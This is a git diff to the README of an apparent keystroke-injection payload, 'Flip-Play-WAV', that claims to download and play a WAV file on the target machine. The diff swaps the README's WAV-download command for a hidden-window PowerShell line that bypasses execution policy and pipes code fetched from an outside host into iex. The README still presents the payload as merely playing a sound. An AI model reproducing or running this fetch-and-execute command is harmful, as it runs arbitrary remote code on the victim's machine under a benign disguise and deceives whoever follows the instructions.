diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md index b172b11..07fc92e 100644 --- a/Payloads/Flip-Play-WAV/README.md +++ b/Payloads/Flip-Play-WAV/README.md @@ -38,7 +38,7 @@ After one is the WAV file will be played. * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download your WAV file ``` -powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav +powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex ```